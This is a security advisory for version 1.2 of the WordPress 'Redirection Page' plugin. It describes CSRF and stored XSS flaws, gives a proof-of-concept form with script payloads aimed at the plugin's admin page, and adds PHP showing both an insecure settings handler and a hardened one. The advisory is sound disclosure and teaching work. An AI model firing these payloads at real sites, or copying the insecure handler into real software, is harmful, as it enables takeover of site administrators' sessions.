WordPress Redirection Page plugin version 1.2 suffers from cross site request forgery and cross site scripting vulnerabilities.
8708e64c5d3cb9316c397f0b2945cfe98631e0b256cf9d8a44f41d8430029ce5
Title: WordPress 'Redirection Page' CSRF/XSS
Version: 1.2
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2015-01-26
Download: https://wordpress.org/plugins/redirection-page/
Contacted WordPress: 2015-01-26
==========================================================
## Plugin description:
==========================================================
Redirect your specified pages, it is useful when you have 404/not-found pages. Go to Settings Page to start redirection.
## CSRF:
==========================================================
It is possible to change the plugin's redirect settings by tricking a logged-in admin into visiting a crafted page: the settings form carries no CSRF token, so any POST with the right parameter names is accepted.
## Stored XSS:
==========================================================
Redirect settings submitted from the admin page are stored and shown unsanitized on the plugin's admin page. This allows an attacker to perform stored XSS through the settings fields (combined with the CSRF issue above, no attacker login is required).
PoC:
Log in as admin and submit this form:
<form method="POST" action="http://[TARGET]/wp-admin/options-general.php?page=redirection-page&redirectionpage_action=add">
<input type="text" name="source" value=""><script>alert(1);</script>"><br />
<input type="text" name="redir" value=""><script>alert(2);</script>"><br />
<input type="submit">
</form>
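For readers maintaining a similar plugin, the following is an added illustration of the two root causes the advisory describes and how a settings handler would close them with WordPress's own nonce, capability, sanitisation and escaping functions. It is not the Redirection Page plugin's code: the function names, the `rp_example_redirects` option and the settings layout are assumptions made for the example; only the admin URL and field names (`source`, `redir`) come from the advisory.

```php
<?php
// Illustrative only: a simplified settings handler modelled on the advisory's
// description, NOT the Redirection Page plugin's own code. Option name,
// function names and the settings layout are assumptions.

// --- Pattern the advisory describes (hypothetical reconstruction) ---
// 1. No CSRF token: any POST to the admin page with the right parameter names
//    is accepted, so a logged-in admin visiting a crafted page silently
//    changes the redirects.
// 2. No sanitisation on input or escaping on output: whatever is stored in the
//    option is echoed back raw into the admin page, so a '"><script>...'
//    value executes there (stored XSS).
function rp_example_add_redirect_insecure() {
    $redirects   = get_option('rp_example_redirects', array());
    $redirects[] = array(
        'source' => $_POST['source'],
        'redir'  => $_POST['redir'],
    );
    update_option('rp_example_redirects', $redirects);
}

function rp_example_render_table_insecure() {
    foreach (get_option('rp_example_redirects', array()) as $row) {
        echo '<tr><td>' . $row['source'] . '</td><td>' . $row['redir'] . '</td></tr>';
    }
}

// --- Hardened version ---
function rp_example_render_form_secure() {
    $action = admin_url('options-general.php?page=redirection-page&redirectionpage_action=add');
    echo '<form method="post" action="' . esc_url($action) . '">';
    // Emits a hidden nonce field bound to this action and the current user;
    // a cross-site page cannot know its value, so forged POSTs fail below.
    wp_nonce_field('rp_example_add_redirect', 'rp_example_nonce');
    echo '<input type="text" name="source">';
    echo '<input type="text" name="redir">';
    echo '<input type="submit" value="Add">';
    echo '</form>';
}

function rp_example_add_redirect_secure() {
    // Capability check: only users allowed to manage options may change settings.
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient permissions.');
    }
    // CSRF check: wp_die()s if the nonce is missing, stale or forged.
    check_admin_referer('rp_example_add_redirect', 'rp_example_nonce');

    // Input sanitisation: strip tags and control characters from the source
    // path, and keep only a well-formed URL for the destination.
    $source = sanitize_text_field(wp_unslash($_POST['source'] ?? ''));
    $redir  = esc_url_raw(wp_unslash($_POST['redir'] ?? ''));
    if ($source === '' || $redir === '') {
        return false; // reject empty input or a destination that is not a URL
    }

    $redirects   = get_option('rp_example_redirects', array());
    $redirects[] = array('source' => $source, 'redir' => $redir);
    update_option('rp_example_redirects', $redirects);
    return true;
}

function rp_example_render_table_secure() {
    // Output escaping: even if a bad value reached the database through an
    // older code path, it is rendered as text, never as markup.
    foreach (get_option('rp_example_redirects', array()) as $row) {
        echo '<tr><td>' . esc_html($row['source']) . '</td><td>' . esc_html($row['redir']) . '</td></tr>';
    }
}
```

Two design points worth noting: `check_admin_referer()` does not replace the capability check, because a nonce only proves the request came from a form the same user loaded, not that the user may change settings; and escaping at output (`esc_html()`) is kept even though input is sanitised, so rows already stored before the fix cannot execute on the admin page.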
## Solution
==========================================================
No fix available.